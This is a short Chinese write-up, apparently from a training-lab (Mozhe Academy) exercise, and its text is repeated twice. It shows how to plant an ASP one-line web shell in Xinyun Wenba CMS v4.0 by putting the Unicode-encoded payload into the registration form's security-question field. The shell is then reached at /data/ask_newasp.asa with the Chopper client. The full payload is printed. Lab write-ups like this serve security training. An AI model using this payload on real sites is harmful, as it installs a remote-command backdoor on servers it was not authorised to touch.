靶场地址:
https://www.mozhe.cn/bug/detail/eHAzLzNPdVUvbkRvOS9uczRCM1J4Zz09bW96aGUmozhe
新云问吧cms插马漏洞出现在v4.0版本中
在注册页面的密码问题中输入“┼攠數畣整爠煥敵瑳∨≡┩愾”,也就是<% execute request("a")%>a经过Unicode转码后的代码。点击注册
一句话木马被插入到了数据库中,在http://ip/data/ask_newasp.asa中,使用菜刀进行连接,密码为a
靶场地址:
https://www.mozhe.cn/bug/detail/eHAzLzNPdVUvbkRvOS9uczRCM1J4Zz09bW96aGUmozhe
新云问吧cms插马漏洞出现在v4.0版本中
在注册页面的密码问题中输入“┼攠數畣整爠煥敵瑳∨≡┩愾”,也就是<% execute request("a")%>a经过Unicode转码后的代码。点击注册
一句话木马被插入到了数据库中,在http://ip/data/ask_newasp.asa中,使用菜刀进行连接,密码为a
本文标题:墨者学院-CMS系统漏洞分析溯源(第3题)
本文链接:https://www.haomeiwen.com/subject/panbkctx.html
网友评论